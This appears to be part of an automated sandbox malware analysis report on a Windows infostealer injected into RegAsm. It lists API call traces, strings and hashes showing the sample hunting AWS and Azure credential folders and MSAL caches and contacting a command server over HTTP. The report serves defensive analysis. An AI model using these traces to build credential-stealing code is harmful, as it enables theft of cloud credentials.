                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                      • String ID: "$"$------$------$------$8wA$build_id$hwid
                                                                                      • API String ID: 3006978581-858375883
                                                                                      • Opcode ID: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
                                                                                      • Instruction ID: 7219792e9a540e442724c4d24598c6325e7ae8fa207a63d5b21e459a2de286cb
                                                                                      • Opcode Fuzzy Hash: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
                                                                                      • Instruction Fuzzy Hash: C002C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8
                                                                                      APIs
                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00401696
                                                                                      • wsprintfW.USER32 ref: 004016BC
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
                                                                                      • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00401705
                                                                                      • _time64.MSVCRT ref: 0040170E
                                                                                      • srand.MSVCRT ref: 00401715
                                                                                      • rand.MSVCRT ref: 0040171E
                                                                                      • _memset.LIBCMT ref: 0040172E
                                                                                      • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
                                                                                      • _memset.LIBCMT ref: 00401763
                                                                                      • CloseHandle.KERNEL32(?), ref: 00401771
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
                                                                                      • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
                                                                                      • _memset.LIBCMT ref: 004017BE
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
                                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 004017CF
                                                                                      • CloseHandle.KERNEL32(?), ref: 004017DB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                      • String ID: %s%s$delays.tmp
                                                                                      • API String ID: 1620473967-1413376734
                                                                                      • Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                      • Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
                                                                                      • Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                      • Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 004164E2
                                                                                        • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                      • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
                                                                                      • lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E
                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                        • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                        • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                        • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                        • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                        • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                      • _memset.LIBCMT ref: 00416556
                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 00416578
                                                                                      • lstrcatA.KERNEL32(?,\.aws\), ref: 00416595
                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                        • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                        • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                      • _memset.LIBCMT ref: 004165CA
                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 004165EC
                                                                                      • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
                                                                                      • _memset.LIBCMT ref: 0041663E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcat$_memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                      • API String ID: 4216275855-974132213
                                                                                      • Opcode ID: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                      • Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
                                                                                      • Opcode Fuzzy Hash: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                      • Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59
                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                      • CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A
                                                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
                                                                                      • StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
                                                                                      • StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
                                                                                      • lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
                                                                                      • lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
                                                                                      • lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
                                                                                      • lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
                                                                                      • lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
                                                                                      • lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
                                                                                      • lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040AF7A
                                                                                      • lstrlenA.KERNEL32(?), ref: 0040AF95
                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040AFD8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                      • String ID:
                                                                                      • API String ID: 1956182324-0
                                                                                      • Opcode ID: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                      • Instruction ID: ea3aaa4254ea011307d5ff1151e45a3af1a32ea2cb92a891b43a4b7d07102f87
                                                                                      • Opcode Fuzzy Hash: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                      • Instruction Fuzzy Hash: E6C15D32904208AFDF15EFA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95
                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                        • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                        • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,0041858F), ref: 004170DD
                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004170EC
                                                                                      • CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176CB
                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176E4
                                                                                        • Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                        • Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                        • Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
                                                                                        • Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2
                                                                                        • Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                        • Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                        • Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
                                                                                        • Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A
                                                                                      • Sleep.KERNEL32(000003E8), ref: 00417A9A
                                                                                        • Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                        • Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                        • Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041858F), ref: 00417100
                                                                                        • Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                        • Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                        • Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                        • Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                        • Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                        • Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                      • CloseHandle.KERNEL32(?), ref: 00418000
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                      • String ID: .exe$.exe$_DEBUG.zip$cowod.$e90840a846d017e7b095f7543cdf2d15$hopto$http://$org
                                                                                      • API String ID: 305159127-1328715557
                                                                                      • Opcode ID: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                      • Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
                                                                                      • Opcode Fuzzy Hash: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                      • Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B
                                                                                      APIs
                                                                                      • strtok_s.MSVCRT ref: 004135EA
                                                                                      • StrCmpCA.SHLWAPI(?,true), ref: 004136AC
                                                                                        • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                        • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041376E
                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 00413817
                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 00413853
                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
                                                                                      • strtok_s.MSVCRT ref: 0041398F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcpy$strtok_s$lstrlen
                                                                                      • String ID: false$true
                                                                                      • API String ID: 2116072422-2658103896
                                                                                      • Opcode ID: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                      • Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
                                                                                      • Opcode Fuzzy Hash: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                      • Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48
                                                                                      APIs
                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                                      • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
                                                                                      • StrCmpCA.SHLWAPI(?), ref: 004052C1
                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
                                                                                      • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
                                                                                      • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
                                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
                                                                                      • InternetCloseHandle.WININET(?), ref: 00405439
                                                                                      • InternetCloseHandle.WININET(?), ref: 00405445
                                                                                      • InternetCloseHandle.WININET(?), ref: 00405451
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                      • String ID: GET$\xA
                                                                                      • API String ID: 442264750-571280152
                                                                                      • Opcode ID: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                      • Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
                                                                                      • Opcode Fuzzy Hash: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                      • Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55
                                                                                      APIs
                                                                                      • __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                      • CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                      • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                      • VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                        • Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
                                                                                        • Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                      • VariantClear.OLEAUT32(?), ref: 00411A8B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
